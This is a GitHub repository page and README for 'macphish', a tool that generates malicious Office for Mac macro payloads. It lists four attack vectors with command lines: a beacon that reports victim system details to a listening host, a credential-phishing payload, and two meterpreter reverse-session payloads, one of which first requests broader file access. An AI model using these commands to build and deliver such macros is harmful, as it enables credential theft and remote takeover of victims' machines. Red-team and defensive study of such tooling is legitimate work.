Python
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
LICENSE Create LICENSE Aug 26, 2017
README.md Update Sep 17, 2017
USAGE.md Adds usage examples about custom dialogs Sep 19, 2017
macphish-alpha.png Adds macphish.py Sep 17, 2017
macphish.log Adds macphish log file Aug 26, 2017
macphish.py Adds macphish.py Sep 17, 2017

README.md

macphish

Office for Mac Macro Payload Generator macphish

Attack vectors

There are 4 attack vectors available:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon

On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:

$./macphish.py -lh <listening host> 

By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

The simplest way of generating a meterpreter payload is:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only python payloads are supported at the moment.

Usage

See https://github.com/cldrn/macphish/wiki/Usage

PoCs